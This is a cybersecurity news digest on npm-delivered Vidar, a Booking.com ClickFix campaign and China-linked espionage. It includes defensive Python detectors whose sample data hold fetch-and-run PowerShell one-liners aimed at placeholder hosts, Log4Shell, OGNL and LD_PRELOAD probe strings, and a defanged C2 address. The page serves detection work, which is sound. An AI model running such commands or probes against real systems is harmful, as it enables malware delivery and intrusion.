German hosting provider aurologic GmbH has emerged as a critical hub within the global malicious infrastructure ecosystem, according to recent intelligence reporting. The Langen-based ISP, which operates AS30823, serves as a primary upstream provider to multiple threat activity enablers (TAEs) and sanctioned entities, establishing itself as a central nexus connecting some of the internet’s most […]
A new ransomware group, Cephalus, has emerged in the cybersecurity threat landscape, targeting organizations through compromised Remote Desktop Protocol (RDP) accounts. First detected in mid-June 2025, this group represents a growing threat to businesses that have not implemented proper security measures on their remote access systems.
How Cephalus Operates
The Cephalus ransomware group employs a […]
ClickFix attacks have surged dramatically over the past year, cementing their position as pivotal tools in the modern attacker’s arsenal. These sophisticated social engineering campaigns coerce users into executing malicious code on their own devices, bypassing traditional awareness defenses that focus on preventing suspicious clicks, dodgy downloads, and phishing websites. During a recent threat briefing […]
A supply-chain attack targeting Windows developers through malicious npm packages shows how much damage an unreviewed install-time script can do.
Between October 21 and 26, 2025, threat actors published 17 malicious npm packages containing 23 releases designed to deliver Vidar infostealer malware.
The campaign exploited the trust developers place in package registries, leveraging legitimate-appearing packages that masqueraded as Telegram bot helpers, icon libraries, and forks of popular projects including Cursor and React.
The attack leveraged two recently created npm accounts, aartje and saliii229911, which published packages downloaded over 2,240 times before removal from the registry.
This distribution method is new for Vidar, which has historically spread through phishing emails carrying malicious Office documents.
The deceptive packaging and plausible functionality let the packages reach victims before they were detected.
Package custom-tg-bot-plan presents like a legitimate SDK on its npm page (Source – DATADOG Security Labs)
Datadog Security Labs security researchers identified the campaign through their GuardDog static analyzer, which flagged suspicious indicators including postinstall script execution and process spawning operations.
The discovery revealed that all packages executed identical attack chains through postinstall scripts, with some variants using PowerShell commands embedded directly in package.json files.
Infection Mechanism and Technical Breakdown
The attack is simple in execution. When a developer installed one of the packages, its postinstall script ran automatically and downloaded an encrypted ZIP archive from bullethost.cloud infrastructure.
The downloader scripts used a hardcoded archive password to extract bridle.exe, a Go-compiled Vidar variant not previously seen in npm distributions.
The malware then ran with the privileges of the user who ran npm install, which on a developer workstation is enough to read browser profiles and wallet files, and began the information theft.
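Because every variant in this campaign keyed off an install hook, the cheapest control is to look at a package's lifecycle scripts before npm runs them. The following Python is an added example written for this page, not Datadog's GuardDog or any other project's code: it reads a package.json, resolves local scripts that an install hook invokes, and flags the behaviours the text describes (process spawning, a remote fetch, archive extraction, PowerShell inline, or an encoded command, which it flags rather than decodes). The three manifests and the install.js body are constructed for the example; the package names, hostname and paths are placeholders, not the campaign's real ones.

```python
"""Gate an npm package on its lifecycle scripts before `npm install` runs them."""
from __future__ import annotations
import base64
import json
import re

# Hooks npm runs on its own during an install; nothing beyond `npm install` is needed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators drawn from the campaign description: a hook that spawns a process,
# fetches a remote archive, unpacks it, or carries PowerShell inline.
INDICATORS = {
    "powershell": re.compile(r"\bpowershell(?:\.exe)?\b|\bpwsh\b", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "remote_fetch": re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|downloadstring|https?://", re.I),
    "archive_extract": re.compile(r"expand-archive|\bunzip\b|adm-zip|extract-zip|\btar\b", re.I),
    "spawn": re.compile(r"child_process|\bexec(?:Sync)?\(|\bspawn(?:Sync)?\(", re.I),
}
# Local script files a hook command may hand to node/powershell/cmd.
SCRIPT_REF = re.compile(r"[\w./\\-]+\.(?:js|cjs|mjs|ps1|cmd|bat)")


def scan_manifest(manifest: dict, script_files: dict[str, str] | None = None) -> list[dict]:
    """Return one finding per install hook that trips an indicator.

    manifest:     parsed package.json
    script_files: {relative path: contents} of local scripts the hooks may invoke,
                  so `node install.js` is judged on install.js, not only on the hook string.
    """
    script_files = script_files or {}
    findings = []
    for hook, command in manifest.get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue
        haystack = command
        for ref in SCRIPT_REF.findall(command):
            haystack += "\n" + script_files.get(ref.lstrip("./"), "")
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
        if hits:
            findings.append({"package": manifest.get("name"), "hook": hook,
                             "command": command, "indicators": hits})
    return findings


def scan_package_json(text: str, script_files: dict[str, str] | None = None) -> list[dict]:
    return scan_manifest(json.loads(text), script_files)


# Constructed samples modelled on the description; names, hostnames and paths are placeholders.
DROPPER_MANIFEST = """{
  "name": "tg-bot-helper-example",
  "version": "1.0.3",
  "scripts": { "postinstall": "node install.js", "test": "echo ok" }
}"""
DROPPER_SCRIPTS = {"install.js": r'''
const { execSync } = require("child_process");
// fetch an archive and unpack it (hostname is a placeholder)
execSync('powershell -w hidden -c "Invoke-WebRequest https://example.invalid/p.zip -OutFile $env:TEMP\p.zip; Expand-Archive -Force $env:TEMP\p.zip $env:TEMP\p"');
'''}
# Variant with the PowerShell embedded directly in package.json as an encoded command.
INLINE_MANIFEST = json.dumps({
    "name": "icons-example",
    "scripts": {"postinstall": "powershell -w hidden -enc "
                + base64.b64encode("iex (iwr https://example.invalid/i)".encode("utf-16-le")).decode()},
})
BENIGN_MANIFEST = '{"name": "native-addon-example", "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"}}'

if __name__ == "__main__":
    for label, text, files in (("dropper", DROPPER_MANIFEST, DROPPER_SCRIPTS),
                               ("inline", INLINE_MANIFEST, None),
                               ("benign", BENIGN_MANIFEST, None)):
        print(label, scan_package_json(text, files))
```

Run it against the unpacked tarball from `npm pack <package>` (or the output of `npm view <package> scripts`) before the first install, and pair it with `npm install --ignore-scripts` or `npm config set ignore-scripts true` so that a hook never runs by default; a native module that genuinely needs a build step can be rebuilt explicitly afterwards.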
This Vidar variant collects browser credentials, cookies, cryptocurrency wallets and system files, then exfiltrates them to its command-and-control infrastructure.
It finds live C2 servers through a dead-drop resolver: hardcoded throwaway Telegram and Steam profiles whose contents the operators update with the current C2 domains. Blocking a single C2 domain therefore does not cut the stealer off; the profile URLs are the more durable indicator.
After exfiltration the malware removes its own traces, which complicates post-compromise detection.
The operators knew the npm ecosystem well enough to vary their tooling: they rotated between multiple C2 domains and varied the postinstall script implementations, most likely to evade pattern-based detection.
The affected packages stayed live on npm for roughly two weeks, which makes this a notable npm-based campaign aimed at both enterprise development environments and individual developers.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
A new threat has surfaced in the mobile banking landscape: Herodotus, a sophisticated Android banking Trojan that has been wreaking havoc in recent weeks. Offered under the Malware-as-a-Service (MaaS) model, Herodotus combines social engineering with technical deception, evading conventional antivirus solutions and putting users' financial data at serious risk. Herodotus addressed victims […]
A sophisticated phishing campaign is actively targeting hotel establishments and their guests through compromised Booking.com accounts, according to research uncovered by security experts.
The campaign, dubbed “I Paid Twice” due to evidence of victims paying twice for their reservations, has been operating since at least April 2025 and remains active as of October 2025.
The attack scheme combines credential theft with multi-stage malware deployment, creating a complex threat targeting the global hospitality sector.
The operation begins when threat actors compromise hotel administrator systems through spearphishing emails that impersonate legitimate Booking.com communications.
Booking.com phishing pages (Source – Sekoia)
These emails contain carefully crafted messages referencing guest reservations and booking platform activity, which lends them credibility with recipients.
The emails carry malicious URLs that route victims through a multi-stage redirection infrastructure before landing them on a ClickFix page.
Once a victim pastes and runs the copied command, malware infects the system and hands the attackers the professional credentials for booking platforms such as Booking.com and Expedia.
The broader criminal ecosystem supporting this operation reveals an alarming level of professionalization within cybercrime communities.
Threat actors harvest hotel administrator credentials and sell them through Russian-speaking cybercrime forums and marketplaces.
High-value compromised Booking.com accounts managing multiple properties in developed nations command prices between $5 and $5,000 depending on activity levels and reservation volumes.
This commodification of stolen credentials has created a self-sustaining fraud pipeline where specialized services handle each phase of the attack chain.
Sekoia security researchers identified the malware family PureRAT at the core of this infection chain.
Once deployed through the ClickFix redirection mechanism, PureRAT executes PowerShell commands that gather system information and download additional payload files.
The malware establishes persistence through Windows registry modifications and implements a sophisticated loader mechanism using DLL side-loading techniques.
Technical Breakdown of the Infection Mechanism
The attack initiates when victims receive phishing emails from compromised hotel accounts. Malicious URLs redirect through randomized domains following the pattern hxxps://{randomname}[.]com/[a-z0-9]{4}.
These domains run JavaScript that checks whether the page is loaded inside an iframe, a check commonly used to dodge analysis tooling, before redirecting the visitor to a ClickFix page.
Infection chain (Source – Sekoia)
The redirection infrastructure serves as a commercialized Traffic Distribution System (TDS), concealing the attacker’s primary infrastructure from detection and takedown efforts.
Each redirection step carefully preserves URL patterns containing keywords like “admin” and “extranet” to maintain perceived legitimacy during the social engineering phase.
On the ClickFix pages, victims see Booking.com brand elements alongside a fake reCAPTCHA interface that instructs them to copy a command.
The copied command is a Base64-encoded PowerShell instruction that the victim runs without understanding what it does.
This initial PowerShell command downloads secondary scripts from staging URLs ending in /bomla, which orchestrate the rest of the infection.
The loader gathers comprehensive system information including machine name, current user, Windows version, and installed antivirus products before downloading a ZIP archive containing executable and dynamic link library files.
Persistence uses more than one technique so the malware survives reboots. The installer creates Run registry values under CurrentVersion\Run that launch PowerShell commands to load the extracted binary.
It also drops shortcut files (.lnk) in the Windows Startup folder, which run when the user logs on.
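Both the pasted ClickFix command and the Run-key and Startup persistence it installs share one tell: a PowerShell command line that hides its window, bypasses the execution policy, or carries an encoded payload. The following Python is an added example written for this page, not Sekoia's tooling or anything from the report: it decodes a -EncodedCommand argument (base64 over UTF-16LE), flags the behaviours the text describes, and applies the same triage to autostart entries, so it serves both the ClickFix description above and the persistence paragraphs. The clipboard command, Run values and shortcut targets are constructed samples; the hostname, the /7h2k path segment, the value names and the file paths are placeholders, and only the /bomla suffix comes from the text.

```python
"""Triage a ClickFix-style PowerShell one-liner and the autostart entries it leaves behind."""
from __future__ import annotations
import base64
import re

ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
POWERSHELL = re.compile(r"\bpowershell(?:\.exe)?\b|\bpwsh(?:\.exe)?\b", re.I)

# Behaviours a pasted "verification" command has no business exhibiting.
SUSPICIOUS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "remote_fetch": re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "staging_path": re.compile(r"/bomla\b", re.I),  # staging URL suffix named in the report
}


def decode_encoded_command(cmdline: str) -> str | None:
    """Recover the plaintext of -EncodedCommand (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command(cmdline: str) -> dict:
    """Match the indicators against the command line plus its decoded payload, if any."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + ("\n" + decoded if decoded else "")
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": sorted(k for k, rx in SUSPICIOUS.items() if rx.search(haystack)),
    }


def triage_autostarts(run_values: dict[str, str], startup_links: dict[str, str]) -> list[dict]:
    """run_values:    {value name: command} read from ...\\CurrentVersion\\Run
    startup_links: {.lnk name: resolved target command line} from the Startup folder
    Only entries that launch PowerShell are returned, each with its command triage."""
    findings = []
    for source, entries in (("run_key", run_values), ("startup_lnk", startup_links)):
        for name, cmd in entries.items():
            if POWERSHELL.search(cmd):
                findings.append({"source": source, "name": name, **triage_command(cmd)})
    return findings


def encode_ps(plaintext: str) -> str:
    """Produce what a ClickFix page puts on the clipboard; used only to build the samples."""
    return base64.b64encode(plaintext.encode("utf-16-le")).decode("ascii")


# Constructed samples modelled on the description; hostnames, names and paths are placeholders.
CLICKFIX_PLAINTEXT = "iex (iwr -UseBasicParsing 'https://example.invalid/7h2k/bomla')"
SAMPLE_CLIPBOARD = "powershell -w hidden -ep bypass -enc " + encode_ps(CLICKFIX_PLAINTEXT)
SAMPLE_RUN_VALUES = {
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
    "Updater": "powershell -w hidden -enc " + encode_ps(r'& "$env:APPDATA\svc\host.exe"'),
}
SAMPLE_STARTUP_LINKS = {
    "Send to OneNote.lnk": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE",
    "update.lnk": r"powershell.exe -w hidden -File C:\Users\Public\run.ps1",
}

if __name__ == "__main__":
    print(triage_command(SAMPLE_CLIPBOARD))
    for finding in triage_autostarts(SAMPLE_RUN_VALUES, SAMPLE_STARTUP_LINKS):
        print(finding)
```

Feed triage_command the process command line from Sysmon event 1 or Security event 4688 with command-line auditing enabled, and triage_autostarts the Run values exported from the registry together with the resolved targets of the .lnk files in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup. Any encoded or hidden-window PowerShell in either place deserves a look, whatever the name of the value or shortcut.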
The malware reports status updates at each infection stage through Command and Control servers, confirming successful progression.
The .exe binary triggers DLL side-loading through AddInProcess32.exe, a signed .NET Framework component that hosts add-ins out of process.
The side-loaded DLL then stages PureRAT in memory rather than dropping it as a separate file, so the only artifacts written to disk are the host executable and the loader DLL, which leaves signature-based tools little to match on. A practical detection is therefore AddInProcess32.exe running from outside the .NET Framework directory, or loading a DLL that is not Microsoft-signed.
The Congressional Budget Office (CBO), which serves as Congress's official financial advisor, has been targeted in a cyberattack suspected to be the work of foreign actors. The breach exposed sensitive financial research data that lawmakers rely on to make crucial budgeting decisions and craft legislation affecting millions of Americans. The CBO confirmed the attack through an official agency […]
LockBit has remained one of the most dominant ransomware-as-a-service (RaaS) groups in the world since its emergence as ABCD ransomware in 2019 and its official launch as LockBit in 2020. Despite high-profile setbacks, including international law enforcement takedowns in early 2024 and a damaging affiliate panel leak in May 2025, the group continues to update its […]
A set of nine malicious NuGet packages has been identified as capable of dropping time-delayed payloads to sabotage database operations and corrupt industrial control systems.
According to software supply chain security company Socket, the packages were published in 2023 and 2024 by a user named “shanhai666” and are designed to run malicious code after specific trigger dates in August 2027 and
China-linked threat actors have intensified their focus on influencing American governmental decision-making processes by targeting organizations involved in shaping international policy.
In April 2025, a sophisticated intrusion into a U.S. non-profit organization revealed the persistent efforts of these attackers to establish long-term network access and gather intelligence related to policy matters.
The threat actors demonstrated considerable technical sophistication, employing multiple evasion techniques and exploiting various vulnerabilities to maintain control over the compromised infrastructure for several weeks.
The attack campaign reflects a broader pattern of Chinese state-sponsored espionage targeting policy-influencing institutions.
Initial reconnaissance began on April 5, 2025, when the attackers ran mass vulnerability scans against the organization's servers, attempting exploits for CVE-2022-26134 (Atlassian Confluence OGNL injection), CVE-2021-44228 (Log4Shell in Log4j), CVE-2017-9805 (Apache Struts REST plugin deserialization), and CVE-2017-17562 (GoAhead web server RCE).
These scanning activities established the foundation for their subsequent exploitation attempts and network compromise.
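Three of the four probes leave a recognisable mark in an ordinary web-server access log, and the mass-scan pattern (one source trying several unrelated exploits within a minute) is itself a useful signal. The following Python is an added example written for this page, not Symantec's detection logic: it parses combined-format log lines, matches the URL-decoded request line, Referer and User-Agent against signatures for the Confluence OGNL, Log4Shell and GoAhead LD_PRELOAD probes, and groups hits by source address. The Struts REST probe is deliberately not covered, because its XStream payload travels in the POST body, which an access log does not record. The five log lines are constructed for the example; the addresses, paths and timestamps are placeholders.

```python
"""Pick the exploit probes described above out of access logs and group them by source."""
from __future__ import annotations
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"')

# Signatures for the probes named in the text, applied to URL-decoded request line,
# Referer and User-Agent (Log4Shell payloads usually ride in a header).
# CVE-2017-9805 (Struts REST) is omitted: its payload is in the POST body, which an
# access log does not keep; that one needs a WAF or IDS feed.
PROBES = {
    "CVE-2022-26134": re.compile(r"\$\{[^}]*(?:@[\w.]+@|java\.lang\.)"),  # OGNL expression in the URI
    "CVE-2021-44228": re.compile(r"\$\{(?:jndi:|\$\{)", re.I),            # ${jndi:...} or nested obfuscation
    "CVE-2017-17562": re.compile(r"[?&]LD_PRELOAD="),                     # GoAhead CGI environment injection
}


def scan_log(text: str) -> list[dict]:
    """Return one finding per (line, probe) match."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, request, status, referer, ua = m.groups()
        haystack = "\n".join(unquote(x) for x in (request, referer, ua))
        for cve, rx in PROBES.items():
            if rx.search(haystack):
                findings.append({"ip": ip, "time": ts, "cve": cve, "request": request, "status": status})
    return findings


def mass_scanners(findings: list[dict], min_distinct: int = 2) -> dict[str, list[str]]:
    """Sources that tried at least `min_distinct` different exploits: the mass-scan pattern."""
    by_ip: dict[str, set[str]] = defaultdict(set)
    for f in findings:
        by_ip[f["ip"]].add(f["cve"])
    return {ip: sorted(cves) for ip, cves in by_ip.items() if len(cves) >= min_distinct}


# Constructed log lines modelled on the scan described above; addresses and paths are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Apr/2025:03:12:41 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Apr/2025:03:12:42 +0000] "GET / HTTP/1.1" 200 5120 "-" "${jndi:ldap://203.0.113.7:1389/a}"
203.0.113.7 - - [05/Apr/2025:03:12:43 +0000] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Apr/2025:03:12:44 +0000] "GET /cgi-bin/test?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.20 - - [05/Apr/2025:03:13:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["cve"], h["request"])
    print("mass scanners:", mass_scanners(hits))
```

The third line (the Struts POST) is in the sample precisely to show that it is not matched; if the fleet runs Struts, the body-inspecting control has to come from elsewhere. Decoding before matching matters: the Confluence probe is almost always sent percent-encoded, as in the first line.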
Symantec security analysts identified multiple tactical indicators linking this campaign to established Chinese threat groups including Space Pirates, Kelp (Salt Typhoon), and Earth Longzhi, a recognized subgroup of the long-standing APT41 collective.
The forensic evidence pointed directly to China-based attribution through several distinctive attack methodologies.
DLL Sideloading as Primary Persistence Mechanism
The attackers deployed DLL sideloading as their primary persistence mechanism, leveraging a legitimate VipreAV component named vetysafe.exe to execute malicious payload sbamres.dll.
This technique exploits Windows’ dynamic library search order by planting malicious code that legitimate applications automatically load and execute.
The attackers also created a scheduled task that ran every 60 minutes as SYSTEM, executing msbuild.exe against an XML project file whose contents are not known but which carried embedded code; MSBuild compiles and runs such inline task code itself, so no separate malicious executable has to touch disk.
That code then communicated with a command-and-control server at hxxp://38.180.83[.]166/6CDF0FC26CDF0FC2.
The combination let the attackers keep persistent access while evading signature-based detection, and it shows the group's continued investment in targeting U.S. policy institutions.
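The scheduled task is the easiest part of that chain to hunt, because every property that makes it suspicious is in the task definition itself. The following Python is an added example written for this page, not Symantec's tooling: it parses the XML that schtasks /query /xml emits and flags a task that runs msbuild.exe as SYSTEM on a repeating trigger against a project file in a user-writable directory. It generalises a little beyond the text by treating a handful of other well-known proxy-execution binaries the same way as msbuild.exe. The two task definitions are constructed; the task names, paths and the 60-minute interval are placeholders modelled on the description above.

```python
"""Triage exported Task Scheduler definitions for the msbuild.exe persistence pattern."""
from __future__ import annotations
import re
import xml.etree.ElementTree as ET

# Signed Windows binaries commonly used as proxies to run attacker-supplied code.
PROXY_HOSTS = {"msbuild.exe", "installutil.exe", "regasm.exe", "regsvcs.exe", "mshta.exe",
               "regsvr32.exe", "rundll32.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system"}
WRITABLE_DIRS = re.compile(r"\\(?:ProgramData|Users|Temp|AppData|Public)\\", re.I)
# ISO 8601 duration as used in <Repetition><Interval>, e.g. PT60M, PT1H, P1D.
DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def iso_minutes(dur: str | None) -> float | None:
    if not dur or not (m := DURATION.match(dur.strip())):
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def triage_task_xml(xml_text: str) -> dict:
    # schtasks emits a UTF-16 declaration; drop it when the caller already holds a str.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text))
    ns = root.tag[1:].split("}")[0] if root.tag.startswith("{") else ""

    def tag(name: str) -> str:
        return f"{{{ns}}}{name}" if ns else name

    def text(path: str) -> str:  # first text node at a path like "Actions/Exec/Command"
        node = root.find("/".join(tag(p) for p in path.split("/")))
        return (node.text or "").strip() if node is not None else ""

    command = text("Actions/Exec/Command").strip('"')
    args = text("Actions/Exec/Arguments")
    user = text("Principals/Principal/UserId")
    interval = None
    triggers = root.find(tag("Triggers"))
    for trig in (triggers if triggers is not None else []):
        node = trig.find(tag("Repetition") + "/" + tag("Interval"))
        if node is not None:
            interval = iso_minutes(node.text)

    flags = []
    if command.split("\\")[-1].lower() in PROXY_HOSTS:
        flags.append("lolbin_host")
        if WRITABLE_DIRS.search(args):
            flags.append("project_in_writable_dir")
    if user.lower() in SYSTEM_IDS:
        flags.append("runs_as_system")
    if interval is not None:
        flags.append("repeating")
    return {"uri": text("RegistrationInfo/URI"), "command": command, "arguments": args,
            "user": user, "interval_minutes": interval, "flags": sorted(flags)}


# Constructed task definitions; names, paths and the interval are placeholders.
SUSPECT_TASK = r"""
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Maintenance\Update</URI></RegistrationInfo>
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT60M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <StartBoundary>2025-04-06T00:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe</Command>
    <Arguments>C:\ProgramData\update.xml</Arguments>
  </Exec></Actions>
</Task>"""
BENIGN_TASK = r"""
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Windows Defender\MpCmdRun.exe</Command>
    <Arguments>Scan -ScheduleJob -ScanTrigger 55</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for sample in (SUSPECT_TASK, BENIGN_TASK):
        print(triage_task_xml(sample))
```

Export a single task with `schtasks /Query /TN "<task path>" /XML`, or all of them from the XML files under %SystemRoot%\System32\Tasks, and score each one: a proxy-execution host, a SYSTEM principal, a short repeat interval and a project file outside Program Files or the Windows directory together are far stronger than any one of them, since plenty of legitimate tasks run as SYSTEM on their own.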